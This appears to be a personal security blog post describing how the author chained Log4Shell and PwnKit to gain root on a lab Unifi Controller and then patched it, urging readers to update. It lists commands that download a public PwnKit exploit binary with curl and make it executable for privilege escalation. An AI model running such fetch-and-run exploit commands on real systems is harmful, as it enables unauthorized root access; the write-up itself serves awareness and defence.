Pwn’d or Patched using CVE 2021-44228 (Log4Shell) and CVE 2021-4034 (PwnKit)
The earlier video –
If you read my initial writeup on the Unifi unpatched status you will know this is still a HUGE issue that needs to be solved.
The new stuff Pwn’d or Patched, you choose –
I have recorded a video walkthrough of the post comprimisation steps here.
The setup – Compromising with CVE 2021-44228 (Log4Shell)
Initially I followed a great guide by Sprocket Security on compromising the Unifi Controller with CVE-2021-44228. That guide walked through gaining access and then amazing work on post exploitation inside the controller application, but not so much on privilege escalation directly at the point of compromise. I started wondering, with all 5,000 vulnerable Unifi Controllers out there, is there a way to compromise the controller and either make it more secure, or do very malicious things within that network or underlying supported services.. Guess what….. YES THERE IS… But I am going to do the good thing! (Caveat, I own this controller it is in a lab. Public IPs but no assets of merit)
The Code Walkthrough – Elevating Priv and Patching using CVE 2021-4034
After you have gained a foothold as described above by Sprocket Security, instead of pivoting into the Software controller, I decided to try to string together another vulnerability and that came in the form of PwnKit or CVE-2021-4034. A simple download of POC Shell code found here, written by Oliver Lyak from Denmark, provided a simple method of escalation. Here is the rough command lines used to finish the escalation:
- curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o ./tmp/PwnKit
- cd /tmp
- chmod +x ./PwnKit
- YOU ARE ROOT!!!
Now it is time to be the White Hat in this situation –
- apt update
- apt upgrade
Following the prompts I patched the vulnerabilities all at once. The unifi software update to 6.5.55 fixed the Log4Shell vulnerability and updating pollkit fixed the PwnKit vulnerability. As a result, the unifi controller is no longer vulnerable to the string and the kill chain is broken!
The takeaway –
Patch your stuff, so I dont have to. If someone with basic skills in ethical hacking can do it, the threat actors will certainly do it and likely already are.